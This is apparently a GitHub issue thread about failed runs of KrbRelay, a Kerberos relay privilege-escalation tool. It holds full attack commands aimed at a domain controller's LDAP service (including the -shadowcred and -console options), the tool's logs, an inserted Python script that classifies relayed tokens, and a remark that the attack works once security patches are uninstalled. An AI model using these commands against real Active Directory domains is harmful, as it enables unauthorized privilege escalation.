
LDAP error bind 49 #1

Closed
darkr4y opened this issue Feb 15, 2022 · 7 comments

Comments


darkr4y commented Feb 15, 2022

DC: WIN-1TCHOPTDEJ5 (Win2016 version [10.0.14393])
Computer in AD: PC-01 (Win10 version [10.0.17763.316])

Reproduce Steps:

  1. a Domain User test1 logged on PC-01
  2. If I don't add any attack args, like KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8, it returns the following result and the LDAP connection is established.
[*] Relaying context: \PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAA45MGb9Q/YaElYFYWcVCgXAkwAADgS//9/pJM3dDPQUCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: [...]
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8187308184a003020105a10302010fa2783076a003020112a26f046d3427170628dc24cda41583fa8d10b65257d34186272388da6e351ae3d15f789ad0c3f395971f810a68ce47377c14370a37cf3c4ba866b516233f9c90929a59296b1f4c4775bd2b7d07cd5f55d310f01ee096da0b0d773137f4b28d452946d442a557c928eacd9d5fb374bec720
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404426a6f83f6c4dfad71a59b06b061aa24e2500665954f53bc2c93912062c36303158612466cb4e98aa707a303a5ac1058385d6c65a349054eda2a05d96a1b3083c5a059
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
  3. If I add any attack args, like KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -console to show an LDAP interactive prompt, it returns the following result; any other attack argument always returns bind error 49:
[*] Relaying context: \PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACzUo56WtQ8KGUjhSm/iGlmAngAACQH//9u3mDSDugeTiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: 05000b0710000000db00330002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2060006002d00000005000500280000000a0063450000000f50432d303154454d504144
[*] bind: 49
[*] ldap_get_option: LDAP_INVALID_CREDENTIALS
[-] Ldap failed

Is there anything I missed?

cube0x0 (Owner) commented Feb 15, 2022

Hi!
Use the FQDN in the spn parameter and try the latest version I just pushed.

darkr4y (Author) commented Feb 15, 2022

I have tried the latest version and the spn param with the FQDN; the whole command is KrbRelay.exe -spn ldap/WIN-1TCHOPTDEJ5.tempad.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -console
and the same error is returned:

[*] Relaying context: tempad.local\PC-01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] CoInitializeSecurity hResult 0x80010119
[*] GetModuleFileName: C:\Users\test1\Desktop\kerberosRelay\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACyVuRV/xS6Pa9PMFEoKzG1AoAAAJAU//8q63PhyIL6VyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] apReq: 05000b0710000000db00330002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2060006002d00000005000500280000000a0063450000000f50432d303154454d504144
[*] bind: 49
[*] ldap_get_option: LDAP_INVALID_CREDENTIALS
[-] Ldap failed

I just reviewed James Forshaw's article and found that maybe the problem is about CoInitializeSecurity.
I modified the code in Program.cs line 865 to print the return value:

Console.WriteLine("[*] Init com server");
var hResult = CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,
    IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
    ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,
    Natives.EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,
    IntPtr.Zero);
// Log the HRESULT; 0x80010119 is RPC_E_TOO_LATE (process security was already initialised)
string hResultStr = "0x" + hResult.ToString("X");
Console.WriteLine("[*] CoInitializeSecurity hResult {0}", hResultStr);

cube0x0 (Owner) commented Feb 15, 2022

A valid apReq starts with "60"; you cannot expect it to work with an invalid apReq :p
Check your environment and parameters.

@cube0x0 cube0x0 closed this as completed Feb 15, 2022
@mgp25 mgp25 mentioned this issue May 26, 2022
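cube0x0's hint that a working apReq begins with 0x60 is a check on what kind of token was relayed: an LDAP SASL bind only succeeds with a Kerberos AP-REQ, either GSS-API wrapped (0x60, Kerberos mech OID, TOK_ID 01 00) or raw (application tag 14, 0x6e), whereas the apReq in this issue begins 05 00 0b, a DCE/RPC bind PDU carrying an NTLMSSP NEGOTIATE, so the DC answers with result 49 (invalidCredentials). The script below is an added diagnostic, not KrbRelay code: it parses the headers of the three token kinds and reports which one it sees. The DCE/RPC apReq and apRep2 samples are copied from the logs in this thread; the GSS-wrapped AP-REQ sample is constructed with its inner AP-REQ cut short.

```python
"""Tell apart the token kinds KrbRelay prints as apReq/apRep (added example, not KrbRelay code).

A relayed LDAP bind only works with a Kerberos AP-REQ: GSS-wrapped (first byte 0x60, Kerberos
mech OID, TOK_ID 01 00) or raw ([APPLICATION 14], first byte 0x6e). The apReq in this issue is
a DCE/RPC bind PDU (05 00 0b ...) carrying NTLMSSP, which the DC answers with LDAP result 49.
"""
KRB5_MECH_OID = bytes.fromhex("2a864886f712010202")  # 1.2.840.113554.1.2.2
SPNEGO_OID = bytes.fromhex("2b0601050502")           # 1.3.6.1.5.5.2
# apReq and apRep2 copied from this issue's logs; GSS sample constructed (inner AP-REQ cut to 6e 00)
APREQ_FROM_ISSUE = "05000b0710000000db00330002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2060006002d00000005000500280000000a0063450000000f50432d303154454d504144"
APREP2_FROM_ISSUE = "6f5b3059a003020105a10302010fa24d304ba003020112a24404426a6f83f6c4dfad71a59b06b061aa24e2500665954f53bc2c93912062c36303158612466cb4e98aa707a303a5ac1058385d6c65a349054eda2a05d96a1b3083c5a059"
GSS_APREQ_SAMPLE = "600f" + "0609" + "2a864886f712010202" + "0100" + "6e00"


def der_length(buf: bytes, pos: int):
    """Decode a DER length at buf[pos]; return (length, index of the first content byte)."""
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    n = first & 0x7F
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def dcerpc_bind_info(raw: bytes) -> dict:
    """Parse the 16-byte DCE/RPC common header and the sec_trailer that precedes the auth data."""
    frag_len = int.from_bytes(raw[8:10], "little")  # drep 0x10 = little-endian integers
    auth_len = int.from_bytes(raw[10:12], "little")
    trailer = frag_len - auth_len - 8                # 8-byte sec_trailer: auth_type, level, pad, ctx id
    return {"ptype": raw[2], "frag_len": frag_len, "auth_len": auth_len,
            "auth_type": raw[trailer], "ntlmssp": raw[trailer + 8:].startswith(b"NTLMSSP\x00")}


def classify_token(hexstr: str) -> str:
    raw = bytes.fromhex(hexstr)
    if raw[:3] == b"\x05\x00\x0b":                   # rpc_vers 5, ptype 11 = bind
        return "dcerpc-bind/ntlmssp" if dcerpc_bind_info(raw)["ntlmssp"] else "dcerpc-bind"
    if raw[0] in (0x6E, 0x6F):                       # raw AP-REQ / AP-REP without a GSS header
        length, pos = der_length(raw, 1)
        kind = "krb5-ap-req" if raw[0] == 0x6E else "krb5-ap-rep"
        return kind if length == len(raw) - pos else kind + " (truncated)"
    if raw[0] == 0x60:                               # GSS-API InitialContextToken (RFC 2743 3.1)
        _, pos = der_length(raw, 1)
        if raw[pos] != 0x06:
            return "gss-malformed"
        oid_len, pos = der_length(raw, pos + 1)
        oid, pos = raw[pos:pos + oid_len], pos + oid_len
        if oid == KRB5_MECH_OID:
            tok_id = raw[pos:pos + 2]                # RFC 4121 TOK_ID: 01 00 AP-REQ, 02 00 AP-REP
            return {b"\x01\x00": "gss-krb5-ap-req", b"\x02\x00": "gss-krb5-ap-rep"}.get(tok_id, "gss-krb5-other")
        return "spnego" if oid == SPNEGO_OID else "gss-unknown-mech"
    return "unknown"
```

Running classify_token over the apReq from this thread reports the DCE/RPC bind with NTLMSSP (auth_type 10, frag_len 219, auth_len 51), which is why the bind cannot succeed regardless of the SPN used.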
NickYan7 commented Jun 7, 2022

> a valid apReq starts with "60", you cannot expect it to work with an invalid apReq :p check your environment and parameters

I got the same error; however, my apReq starts with 60, which is a valid packet as you said...
Besides, I also got the error [*] ldap_modify: LDAP_NO_SUCH_OBJECT. I had tried FQDN, hostname with $ and hostname only; none of them worked. Please check this, thanks a lot!!

Tested on Win10 1909 & Win10 20H2; the DC is Server 16.

NickYan7 commented Jun 7, 2022

When I use the FQDN, it prints this:
[*] System.ArgumentNullException: value cannot be null

The command is krbrelay.exe -spn ldap/dc.local.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred pc$.local.com -port 10.

And I'm sure the apReq starts with 60.

[screenshot attached: Screenshot 2022-06-07 10 59 59 PM]

@cube0x0

ecote7 commented Nov 28, 2022

> when I use FQDN, it printed like this: [*] System.ArgumentNullException: value cannot be null
>
> The command is krbrelay.exe -spn ldap/dc.local.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred pc$.local.com -port 10.
>
> And I'm sure the apReq starts with 60.
>
> [screenshot attached: Screenshot 2022-06-07 10 59 59 PM]
>
> @cube0x0

Same issue here. Anyone found a solution?

ecote7 commented Nov 28, 2022

It looks like it has been patched: https://blog.0patch.com/2022/08/micropatching-krbrelay-local-privilege.html
It works when I uninstall the MS security patches that were installed (in November in my case).
